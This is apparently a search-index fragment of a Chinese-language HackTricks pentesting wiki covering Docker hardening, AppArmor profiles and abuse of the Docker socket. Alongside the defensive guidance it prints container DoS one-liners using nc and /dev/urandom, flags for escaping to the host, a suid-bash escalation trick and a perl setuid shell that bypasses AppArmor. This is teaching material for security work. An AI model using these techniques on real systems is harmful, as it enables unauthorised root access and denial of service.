共享都是 1024,则在 CPU 资源争用的情况下,每个容器最多可以占用 33% 的 CPU。blkio-weight 是控制容器 IO 的比率。它的默认值为 500,范围在 10 到 1000 之间。 docker run -it -m 500M --kernel-memory 50M --cpu-shares 512 --blkio-weight 400 --name ubuntu1 ubuntu bash 要获取容器的 cgroup,您可以执行: bash docker run -dt --rm denial sleep 1234 #Run a large sleep inside a Debian container\\nps -ef | grep 1234 #Get info about the sleep process\\nls -l /proc//ns #Get the Group and the namespaces (some may be uniq to the hosts and some may be shred with it) 有关更多信息,请查看: CGroups","breadcrumbs":"Linux Privilege Escalation » Docker Security » cgroups","id":"1549","title":"cgroups"},"155":{"body":"Telecom Network Exploitation","breadcrumbs":"Pentesting Network » Telecom / Mobile-Core (GTP) Exploitation","id":"155","title":"Telecom / Mobile-Core (GTP) Exploitation"},"1550":{"body":"能力允许 对可以允许的根用户能力进行更细粒度的控制 。Docker使用Linux内核能力特性来 限制可以在容器内执行的操作 ,无论用户类型如何。 当运行docker容器时, 进程会放弃敏感能力,以防止进程逃离隔离 。这试图确保进程无法执行敏感操作并逃逸: Linux Capabilities","breadcrumbs":"Linux Privilege Escalation » Docker Security » 能力","id":"1550","title":"能力"},"1551":{"body":"这是一种安全特性,允许Docker 限制可以在容器内使用的系统调用 : Seccomp","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker中的Seccomp","id":"1551","title":"Docker中的Seccomp"},"1552":{"body":"AppArmor 是一个内核增强,用于将 容器 限制在 有限 的 资源 集内,并具有 每个程序的配置文件 : AppArmor","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker中的AppArmor","id":"1552","title":"Docker中的AppArmor"},"1553":{"body":"标记系统 :SELinux为每个进程和文件系统对象分配一个唯一的标签。 策略执行 :它执行定义进程标签可以对系统内其他标签执行哪些操作的安全策略。 容器进程标签 :当容器引擎启动容器进程时,通常会分配一个受限的SELinux标签,通常为container_t。 容器内文件标记 :容器内的文件通常标记为container_file_t。 策略规则 :SELinux策略主要确保具有container_t标签的进程只能与标记为container_file_t的文件进行交互(读取、写入、执行)。 该机制确保即使容器内的进程被攻陷,它也仅限于与具有相应标签的对象进行交互,从而显著限制此类攻陷可能造成的损害。 SELinux","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker中的SELinux","id":"1553","title":"Docker中的SELinux"},"1554":{"body":"在Docker中,授权插件在安全性中发挥着关键作用,通过决定是否允许或阻止对Docker守护进程的请求来实现。这一决定是通过检查两个关键上下文来做出的: 身份验证上下文 :这包括有关用户的全面信息,例如他们是谁以及他们如何进行身份验证。 命令上下文 :这包括与所发请求相关的所有相关数据。 这些上下文有助于确保只有经过身份验证的用户的合法请求被处理,从而增强Docker操作的安全性。 AuthZ& AuthN - Docker Access Authorization Plugin","breadcrumbs":"Linux Privilege Escalation » Docker Security » AuthZ & AuthN","id":"1554","title":"AuthZ & AuthN"},"1555":{"body":"如果您没有正确限制容器可以使用的资源,则被攻陷的容器可能会对其运行的主机造成DoS。 CPU DoS bash # stress-ng\\nsudo apt-get install -y stress-ng && stress-ng --vm 1 --vm-bytes 1G --verify -t 5m # While loop\\ndocker run -d --name malicious-container -c 512 busybox sh -c \'while true; do :; done\' 带宽DoS bash nc -lvp 4444 >/dev/null & while true; do cat /dev/urandom | nc 4444; done","breadcrumbs":"Linux Privilege Escalation » Docker Security » 来自容器的DoS","id":"1555","title":"来自容器的DoS"},"1556":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » 有趣的 Docker 标志","id":"1556","title":"有趣的 Docker 标志"},"1557":{"body":"在以下页面中,您可以了解 --privileged 标志意味着什么 : Docker --privileged","breadcrumbs":"Linux Privilege Escalation » Docker Security » --privileged 标志","id":"1557","title":"--privileged 标志"},"1558":{"body":"no-new-privileges 如果您正在运行一个容器,攻击者设法以低权限用户身份获得访问权限。如果您有一个 配置错误的 suid 二进制文件 ,攻击者可能会利用它并 在容器内提升权限 。这可能允许他逃离容器。 启用 no-new-privileges 选项运行容器将 防止这种权限提升 。 docker run -it --security-opt=no-new-privileges:true nonewpriv 其他 bash #You can manually add/drop capabilities with\\n--cap-add\\n--cap-drop # You can manually disable seccomp in docker with\\n--security-opt seccomp=unconfined # You can manually disable seccomp in docker with\\n--security-opt apparmor=unconfined # You can manually disable selinux in docker with\\n--security-opt label:disable 对于更多 --security-opt 选项,请查看: https://docs.docker.com/engine/reference/run/#security-configuration","breadcrumbs":"Linux Privilege Escalation » Docker Security » --security-opt","id":"1558","title":"--security-opt"},"1559":{"body":"","breadcrumbs":"Linux Privilege Escalation » Docker Security » 其他安全考虑","id":"1559","title":"其他安全考虑"},"156":{"body":"https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 Network Security Assessment: Know Your Network (3rd edition) Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things. By Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou, Beau Wood https://medium.com/@cursedpkt/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » 参考资料","id":"156","title":"参考资料"},"1560":{"body":"避免直接在 Docker 镜像中嵌入机密或使用环境变量至关重要,因为这些方法会通过 docker inspect 或 exec 等命令将您的敏感信息暴露给任何可以访问容器的人。 Docker 卷 是一种更安全的替代方案,推荐用于访问敏感信息。它们可以作为内存中的临时文件系统使用,减轻与 docker inspect 和日志记录相关的风险。然而,根用户和具有 exec 访问权限的用户仍然可能访问这些机密。 Docker secrets 提供了一种更安全的方法来处理敏感信息。对于在镜像构建阶段需要机密的实例, BuildKit 提供了一个高效的解决方案,支持构建时机密,提升构建速度并提供额外功能。 要利用 BuildKit,可以通过三种方式激活: 通过环境变量: export DOCKER_BUILDKIT=1 通过命令前缀: DOCKER_BUILDKIT=1 docker build . 通过在 Docker 配置中默认启用: { \\"features\\": { \\"buildkit\\": true } },然后重启 Docker。 BuildKit 允许使用 --secret 选项来处理构建时机密,确保这些机密不会包含在镜像构建缓存或最终镜像中,使用命令如下: bash docker build --secret my_key=my_value ,src=path/to/my_secret_file . 对于运行中的容器所需的秘密, Docker Compose 和 Kubernetes 提供了强大的解决方案。Docker Compose 在服务定义中使用 secrets 键来指定秘密文件,如 docker-compose.yml 示例所示: yaml version: \\"3.7\\"\\nservices:\\nmy_service:\\nimage: centos:7\\nentrypoint: \\"cat /run/secrets/my_secret\\"\\nsecrets:\\n- my_secret\\nsecrets:\\nmy_secret:\\nfile: ./my_secret_file.txt 此配置允许在使用 Docker Compose 启动服务时使用秘密。 在 Kubernetes 环境中,秘密是原生支持的,并且可以通过像 Helm-Secrets 这样的工具进一步管理。Kubernetes 的基于角色的访问控制 (RBAC) 增强了秘密管理的安全性,类似于 Docker Enterprise。","breadcrumbs":"Linux Privilege Escalation » Docker Security » 管理机密:最佳实践","id":"1560","title":"管理机密:最佳实践"},"1561":{"body":"gVisor 是一个应用内核,使用 Go 编写,实施了 Linux 系统表面的相当大一部分。它包括一个名为 runsc 的 Open Container Initiative (OCI) 运行时,提供了 应用程序与主机内核之间的隔离边界 。runsc 运行时与 Docker 和 Kubernetes 集成,使得运行沙箱容器变得简单。 GitHub - google/gvisor: Application Kernel for Containers","breadcrumbs":"Linux Privilege Escalation » Docker Security » gVisor","id":"1561","title":"gVisor"},"1562":{"body":"Kata Containers 是一个开源社区,致力于构建一个安全的容器运行时,使用轻量级虚拟机,感觉和表现像容器,但提供 使用硬件虚拟化技术的更强工作负载隔离 作为第二道防线。 Kata Containers - Open Source Container Runtime Software | Kata Containers","breadcrumbs":"Linux Privilege Escalation » Docker Security » Kata Containers","id":"1562","title":"Kata Containers"},"1563":{"body":"不要使用 --privileged 标志或在容器内挂载 Docker 套接字 。 Docker 套接字允许生成容器,因此这是完全控制主机的简单方法,例如,通过使用 --privileged 标志运行另一个容器。 不要在容器内以 root 身份运行。使用 不同用户 和 用户命名空间 。 容器中的 root 与主机上的相同,除非通过用户命名空间重新映射。它仅受到 Linux 命名空间、能力和 cgroups 的轻微限制。 丢弃所有能力 (--cap-drop=all),仅启用所需的能力 (--cap-add=...)。许多工作负载不需要任何能力,添加它们会增加潜在攻击的范围。 使用“no-new-privileges”安全选项 以防止进程获得更多权限,例如通过 suid 二进制文件。 限制容器可用的资源 。 资源限制可以保护机器免受拒绝服务攻击。 调整 seccomp 、 AppArmor (或 SELinux) 配置文件,以将容器可用的操作和系统调用限制到最低要求。 使用 官方 Docker 镜像 并要求签名 ,或基于它们构建自己的镜像。不要继承或使用 后门 镜像。还要将根密钥、密码短语存放在安全的地方。Docker 计划通过 UCP 管理密钥。 定期 重建 镜像以 应用安全补丁到主机和镜像。 明智地管理您的 秘密 ,以使攻击者难以访问它们。 如果您 暴露 Docker 守护进程,请使用 HTTPS ,并进行客户端和服务器身份验证。 在您的 Dockerfile 中, 优先使用 COPY 而不是 ADD 。ADD 会自动提取压缩文件,并可以从 URL 复制文件。COPY 没有这些功能。尽可能避免使用 ADD,以免受到通过远程 URL 和 Zip 文件的攻击。 为每个微服务 使用单独的容器 不要在容器内放置 ssh ,可以使用 “docker exec” 连接到容器。 拥有 更小的 容器 镜像","breadcrumbs":"Linux Privilege Escalation » Docker Security » 总结提示","id":"1563","title":"总结提示"},"1564":{"body":"如果您 在 Docker 容器内 或者您有权访问 docker 组中的用户 ,您可以尝试 逃逸并提升权限 : Docker Breakout / Privilege Escalation","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker 突破 / 权限提升","id":"1564","title":"Docker 突破 / 权限提升"},"1565":{"body":"如果您可以访问 Docker 套接字或可以访问 docker 组中的用户,但您的操作受到 Docker 身份验证插件的限制 ,请检查您是否可以 绕过它: AuthZ& AuthN - Docker Access Authorization Plugin","breadcrumbs":"Linux Privilege Escalation » Docker Security » Docker 身份验证插件绕过","id":"1565","title":"Docker 身份验证插件绕过"},"1566":{"body":"工具 docker-bench-security 是一个脚本,检查在生产中部署 Docker 容器的数十个常见最佳实践。所有测试都是自动化的,并基于 CIS Docker 基准 v1.3.1 。 您需要从运行 Docker 的主机或具有足够权限的容器中运行该工具。了解 如何在 README 中运行它: https://github.com/docker/docker-bench-security 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » 加固 Docker","id":"1566","title":"加固 Docker"},"1567":{"body":"https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/ https://twitter.com/_fel1x/status/1151487051986087936 https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html https://sreeninet.wordpress.com/2016/03/06/docker-security-part-1overview/ https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/ https://sreeninet.wordpress.com/2016/03/06/docker-security-part-3engine-access/ https://sreeninet.wordpress.com/2016/03/06/docker-security-part-4container-image/ https://en.wikipedia.org/wiki/Linux_namespaces https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57 https://www.redhat.com/sysadmin/privileged-flag-container-engines https://docs.docker.com/engine/extend/plugins_authorization https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57 https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » 参考","id":"1567","title":"参考"},"1568":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 有些情况下你只拥有 docker socket的访问权限 ,并且想要利用它来 提升权限 。某些操作可能会非常可疑,你可能想要避免它们,因此在这里你可以找到不同的标志,这些标志可能对提升权限有用:","breadcrumbs":"Linux Privilege Escalation » Docker Security » Abusing Docker Socket for Privilege Escalation » Abusing Docker Socket for Privilege Escalation","id":"1568","title":"Abusing Docker Socket for Privilege Escalation"},"1569":{"body":"你可以在以root身份运行的容器中 挂载 文件系统的不同部分并 访问 它们。 你也可以 利用挂载来提升容器内的权限 。 -v /:/host -> 在容器中挂载主机文件系统,以便你可以 读取主机文件系统 。 如果你想要 感觉像在主机上 但实际上在容器中,你可以使用以下标志禁用其他防御机制: --privileged --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined -security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host --device=/dev/sda1 --cap-add=SYS_ADMIN --security-opt apparmor=unconfined -> 这与前面的方法类似,但这里我们是 挂载设备磁盘 。然后,在容器内运行 mount /dev/sda1 /mnt,你可以在 /mnt 中 访问 主机文件系统。 在主机上运行 fdisk -l 找到要挂载的 设备。 -v /tmp:/host -> 如果由于某种原因你只能 挂载主机的某个目录 并且你可以在主机内访问它。挂载它并在挂载目录中创建一个带有 suid 的**/bin/bash ,这样你就可以 从主机执行它并提升到root**。 note 请注意,也许你无法挂载文件夹 /tmp,但你可以挂载一个 不同的可写文件夹 。你可以使用以下命令找到可写目录:find / -writable -type d 2>/dev/null 请注意,并非所有Linux机器上的目录都支持suid位! 要检查哪些目录支持suid位,请运行 mount | grep -v \\"nosuid\\"。例如,通常 /dev/shm、/run、/proc、/sys/fs/cgroup 和 /var/lib/lxcfs 不支持suid位。 还要注意,如果你可以 挂载 /etc 或任何其他 包含配置文件 的文件夹,你可以在docker容器中以root身份更改它们,以便在主机上 利用它们 并提升权限(可能修改 /etc/shadow)。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Abusing Docker Socket for Privilege Escalation » 通过挂载","id":"1569","title":"通过挂载"},"157":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。 下表展示了 DHCPv6 和 DHCPv4 消息类型的比较视图: DHCPv6 消息类型 DHCPv4 消息类型 Solicit (1) DHCPDISCOVER Advertise (2) DHCPOFFER Request (3), Renew (5), Rebind (6) DHCPREQUEST Reply (7) DHCPACK / DHCPNAK Release (8) DHCPRELEASE Information-Request (11) DHCPINFORM Decline (9) DHCPDECLINE Confirm (4) none Reconfigure (10) DHCPFORCERENEW Relay-Forw (12), Relay-Reply (13) none DHCPv6 消息类型的详细说明: Solicit (1) :由 DHCPv6 客户端发起,以查找可用的服务器。 Advertise (2) :服务器在响应 Solicit 时发送,表示 DHCP 服务的可用性。 Request (3) :客户端用此请求特定服务器的 IP 地址或前缀。 Confirm (4) :客户端用于验证分配的地址在网络上是否仍然有效,通常在网络变化后。 Renew (5) :客户端向原服务器发送此消息以延长地址生命周期或更新配置。 Rebind (6) :发送给任何服务器以延长地址生命周期或更新配置,特别是在未收到 Renew 响应时。 Reply (7) :服务器用此提供地址、配置参数或确认如 Release 或 Decline 的消息。 Release (8) :客户端通知服务器停止使用一个或多个分配的地址。 Decline (9) :客户端发送此消息以报告分配的地址在网络上发生冲突。 Reconfigure (10) :服务器提示客户端发起新或更新配置的事务。 Information-Request (11) :客户端请求配置参数而不分配 IP 地址。 Relay-Forw (12) :中继代理将消息转发给服务器。 Relay-Repl (13) :服务器回复中继代理,后者将消息传递给客户端。","breadcrumbs":"Pentesting Network » DHCPv6 » DHCPv6 与 DHCPv4 消息类型比较","id":"157","title":"DHCPv6 与 DHCPv4 消息类型比较"},"1570":{"body":"--privileged -> 使用此标志,你可以 移除容器的所有隔离 。检查技术以 以root身份从特权容器中逃逸 。 --cap-add= [--security-opt apparmor=unconfined] [--security-opt seccomp=unconfined] [-security-opt label:disable] -> 为了 通过能力提升 , 将该能力授予容器 并禁用可能阻止漏洞工作的其他保护方法。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Abusing Docker Socket for Privilege Escalation » 从容器中逃逸","id":"1570","title":"从容器中逃逸"},"1571":{"body":"在本页中,我们讨论了使用docker标志提升权限的方法,你可以在页面中找到 使用curl命令滥用这些方法的方式 : tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » Abusing Docker Socket for Privilege Escalation » Curl","id":"1571","title":"Curl"},"1572":{"body":"Reading time: 14 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » AppArmor","id":"1572","title":"AppArmor"},"1573":{"body":"AppArmor 是一个 内核增强,旨在通过每个程序的配置文件限制程序可用的资源 ,有效地通过将访问控制属性直接与程序而非用户绑定来实现强制访问控制 (MAC)。该系统通过 将配置文件加载到内核中 来运行,通常在启动时,这些配置文件规定了程序可以访问的资源,例如网络连接、原始套接字访问和文件权限。 AppArmor 配置文件有两种操作模式: 强制模式 :此模式积极执行配置文件中定义的策略,阻止违反这些政策的操作,并通过 syslog 或 auditd 等系统记录任何试图违反的行为。 投诉模式 :与强制模式不同,投诉模式不会阻止违反配置文件政策的操作。相反,它将这些尝试记录为政策违规,而不执行限制。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 基本信息","id":"1573","title":"基本信息"},"1574":{"body":"内核模块 :负责政策的执行。 政策 :指定程序行为和资源访问的规则和限制。 解析器 :将政策加载到内核中以进行执行或报告。 实用程序 :这些是用户模式程序,提供与 AppArmor 交互和管理的接口。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » AppArmor 的组件","id":"1574","title":"AppArmor 的组件"},"1575":{"body":"Apparmor 配置文件通常保存在 /etc/apparmor.d/ 使用 sudo aa-status,您将能够列出受某些配置文件限制的二进制文件。如果您将每个列出二进制文件路径中的字符 \\"/\\" 更改为点,您将获得提到的文件夹内的 apparmor 配置文件名称。 例如, apparmor 配置文件对于 /usr/bin/man 将位于 /etc/apparmor.d/usr.bin.man","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 配置文件路径","id":"1575","title":"配置文件路径"},"1576":{"body":"bash aa-status #check the current status\\naa-enforce #set profile to enforce mode (from disable or complain)\\naa-complain #set profile to complain mode (from diable or enforcement)\\napparmor_parser #to load/reload an altered policy\\naa-genprof #generate a new profile\\naa-logprof #used to change the policy when the binary/program is changed\\naa-mergeprof #used to merge the policies","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 命令","id":"1576","title":"命令"},"1577":{"body":"为了指示受影响的可执行文件, 绝对路径和通配符 被允许用于指定文件。 要指示二进制文件对 文件 的访问,可以使用以下 访问控制 : r (读取) w (写入) m (将内存映射为可执行) k (文件锁定) l (创建硬链接) ix (执行另一个程序,新程序继承策略) Px (在另一个配置文件下执行,清理环境后) Cx (在子配置文件下执行,清理环境后) Ux (在无约束下执行,清理环境后) 变量 可以在配置文件中定义,并可以从配置文件外部进行操作。例如:@{PROC} 和 @{HOME}(将 #include 添加到配置文件中) 支持拒绝规则以覆盖允许规则 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 创建配置文件","id":"1577","title":"创建配置文件"},"1578":{"body":"为了轻松开始创建配置文件,apparmor 可以帮助你。可以让 apparmor 检查二进制文件执行的操作,然后让你决定要允许或拒绝哪些操作 。 你只需运行: bash sudo aa-genprof /path/to/binary 然后,在另一个控制台中执行二进制文件通常会执行的所有操作: bash /path/to/binary -a dosomething 然后,在第一个控制台中按“ s ”,然后在记录的操作中指示您想要忽略、允许或其他。当您完成后按“ f ”,新配置文件将创建在 /etc/apparmor.d/path.to.binary note 使用箭头键可以选择您想要允许/拒绝/其他的内容","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » aa-genprof","id":"1578","title":"aa-genprof"},"1579":{"body":"您还可以使用以下命令创建二进制文件的 apparmor 配置文件模板: bash sudo aa-easyprof /path/to/binary\\n# vim:syntax=apparmor\\n# AppArmor policy for binary\\n# ###AUTHOR###\\n# ###COPYRIGHT###\\n# ###COMMENT### #include # No template variables specified \\"/path/to/binary\\" {\\n#include # No abstractions specified # No policy groups specified # No read paths specified # No write paths specified\\n} note 请注意,默认情况下,在创建的配置文件中没有任何内容被允许,因此所有内容都被拒绝。您需要添加类似 /etc/passwd r, 的行,以允许二进制文件读取 /etc/passwd,例如。 您可以然后 enforce 新的配置文件,使用 bash sudo apparmor_parser -a /etc/apparmor.d/path.to.binary","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » aa-easyprof","id":"1579","title":"aa-easyprof"},"158":{"body":"https://support.huawei.com/enterprise/en/doc/EDOC1100306163/d427e938/introduction-to-dhcpv6-messages tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Pentesting Network » DHCPv6 » 参考文献","id":"158","title":"参考文献"},"1580":{"body":"以下工具将读取日志并询问用户是否希望允许某些检测到的禁止操作: bash sudo aa-logprof note 使用箭头键可以选择您想要允许/拒绝/其他的内容","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 从日志修改配置文件","id":"1580","title":"从日志修改配置文件"},"1581":{"body":"bash #Main profile management commands\\napparmor_parser -a /etc/apparmor.d/profile.name #Load a new profile in enforce mode\\napparmor_parser -C /etc/apparmor.d/profile.name #Load a new profile in complain mode\\napparmor_parser -r /etc/apparmor.d/profile.name #Replace existing profile\\napparmor_parser -R /etc/apparmor.d/profile.name #Remove profile","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 管理配置文件","id":"1581","title":"管理配置文件"},"1582":{"body":"来自 /var/log/audit/audit.log 的可执行文件 service_bin 的 AUDIT 和 DENIED 日志示例: bash type=AVC msg=audit(1610061880.392:286): apparmor=\\"AUDIT\\" operation=\\"getattr\\" profile=\\"/bin/rcat\\" name=\\"/dev/pts/1\\" pid=954 comm=\\"service_bin\\" requested_mask=\\"r\\" fsuid=1000 ouid=1000\\ntype=AVC msg=audit(1610061880.392:287): apparmor=\\"DENIED\\" operation=\\"open\\" profile=\\"/bin/rcat\\" name=\\"/etc/hosts\\" pid=954 comm=\\"service_bin\\" requested_mask=\\"r\\" denied_mask=\\"r\\" fsuid=1000 ouid=0 您还可以使用以下方法获取此信息: bash sudo aa-notify -s 1 -v\\nProfile: /bin/service_bin\\nOperation: open\\nName: /etc/passwd\\nDenied: r\\nLogfile: /var/log/audit/audit.log Profile: /bin/service_bin\\nOperation: open\\nName: /etc/hosts\\nDenied: r\\nLogfile: /var/log/audit/audit.log AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021)\\nFor more information, please see: https://wiki.ubuntu.com/DebuggingApparmor","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 日志","id":"1582","title":"日志"},"1583":{"body":"注意 docker-profile 的配置文件是默认加载的: bash sudo aa-status\\napparmor module is loaded.\\n50 profiles are loaded.\\n13 profiles are in enforce mode.\\n/sbin/dhclient\\n/usr/bin/lxc-start\\n/usr/lib/NetworkManager/nm-dhcp-client.action\\n/usr/lib/NetworkManager/nm-dhcp-helper\\n/usr/lib/chromium-browser/chromium-browser//browser_java\\n/usr/lib/chromium-browser/chromium-browser//browser_openjdk\\n/usr/lib/chromium-browser/chromium-browser//sanitized_helper\\n/usr/lib/connman/scripts/dhclient-script\\ndocker-default 默认情况下, Apparmor docker-default 配置文件 是从 https://github.com/moby/moby/tree/master/profiles/apparmor 生成的。 docker-default 配置文件摘要 : 访问 所有 网络 未定义能力 (但是,一些能力将来自包含基本基础规则,即 #include ) 写入 任何**/proc** 文件 不允许 其他/ proc 和/ sys 的 子目录 / 文件 被 拒绝 读/写/锁/链接/执行访问 挂载****不允许 Ptrace 只能在被 相同 apparmor 配置文件 限制的进程上运行 一旦你 运行一个 docker 容器 ,你应该看到以下输出: bash 1 processes are in enforce mode.\\ndocker-default (825) 注意, apparmor 甚至会阻止默认情况下授予容器的能力特权 。例如,它将能够 阻止写入 /proc 的权限,即使授予了 SYS_ADMIN 能力 ,因为默认情况下 docker apparmor 配置文件拒绝此访问: bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash\\necho \\"\\" > /proc/stat\\nsh: 1: cannot create /proc/stat: Permission denied 您需要 禁用 apparmor 以绕过其限制: bash docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash 请注意,默认情况下, AppArmor 还会 禁止容器从内部挂载 文件夹,即使具有 SYS_ADMIN 能力。 请注意,您可以 添加/删除 能力 到 docker 容器(这仍然会受到 AppArmor 和 Seccomp 等保护方法的限制): --cap-add=SYS_ADMIN 给予 SYS_ADMIN 能力 --cap-add=ALL 给予所有能力 --cap-drop=ALL --cap-add=SYS_PTRACE 删除所有能力,仅给予 SYS_PTRACE note 通常,当您 发现 在 docker 容器 内部 有一个 特权能力 可用 但 某些部分的 利用没有工作 时,这将是因为 docker apparmor 会阻止它 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » Apparmor in Docker","id":"1583","title":"Apparmor in Docker"},"1584":{"body":"(示例来自 这里 ) 为了说明 AppArmor 的功能,我创建了一个新的 Docker 配置文件 “mydocker”,并添加了以下行: deny /etc/* w, # deny write for all files directly in /etc (not in a subdir) 要激活配置文件,我们需要执行以下操作: sudo apparmor_parser -r -W mydocker 要列出配置文件,我们可以执行以下命令。下面的命令列出了我的新 AppArmor 配置文件。 $ sudo apparmor_status | grep mydocker\\nmydocker 如下面所示,当尝试更改“/etc/”时,我们会遇到错误,因为 AppArmor 配置文件阻止对“/etc”的写入访问。 $ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname\\nchmod: /etc/hostname: Permission denied","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » 示例","id":"1584","title":"示例"},"1585":{"body":"您可以使用以下命令找到 正在运行容器的 apparmor 配置文件 : bash docker inspect 9d622d73a614 | grep lowpriv\\n\\"AppArmorProfile\\": \\"lowpriv\\",\\n\\"apparmor=lowpriv\\" 然后,您可以运行以下命令来 查找正在使用的确切配置文件 : bash find /etc/apparmor.d/ -name \\"*lowpriv*\\" -maxdepth 1 2>/dev/null 在奇怪的情况下,你可以 修改 apparmor docker 配置文件并重新加载它。 你可以删除限制并“绕过”它们。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » AppArmor Docker Bypass1","id":"1585","title":"AppArmor Docker Bypass1"},"1586":{"body":"AppArmor 是基于路径的, 这意味着即使它可能在保护像 /proc 这样的目录中的文件,如果你可以 配置容器的运行方式, 你可以 挂载 主机的 proc 目录到 /host/proc ,并且它 将不再受到 AppArmor 的保护 。","breadcrumbs":"Linux Privilege Escalation » Docker Security » AppArmor » AppArmor Docker Bypass2","id":"1586","title":"AppArmor Docker Bypass2"},"1587":{"body":"在 这个漏洞 中,你可以看到一个例子,说明 即使你正在防止 perl 使用某些资源运行, 如果你只需创建一个 shell 脚本 在第一行指定 #!/usr/bin/perl 并且你 直接执行该文件, 你将能够执行你想要的任何内容。例如: perl echo \'#!/usr/bin/perl\\nuse POSIX qw(strftime);\\nuse POSIX qw(setuid);\\nPOSIX::setuid(0);\\nexec \\"/bin/sh\\"\' > /tmp/test.pl\\nchmod +x /tmp/test.pl\\n/tmp/test.pl tip 学习和实践 AWS 黑客技术: 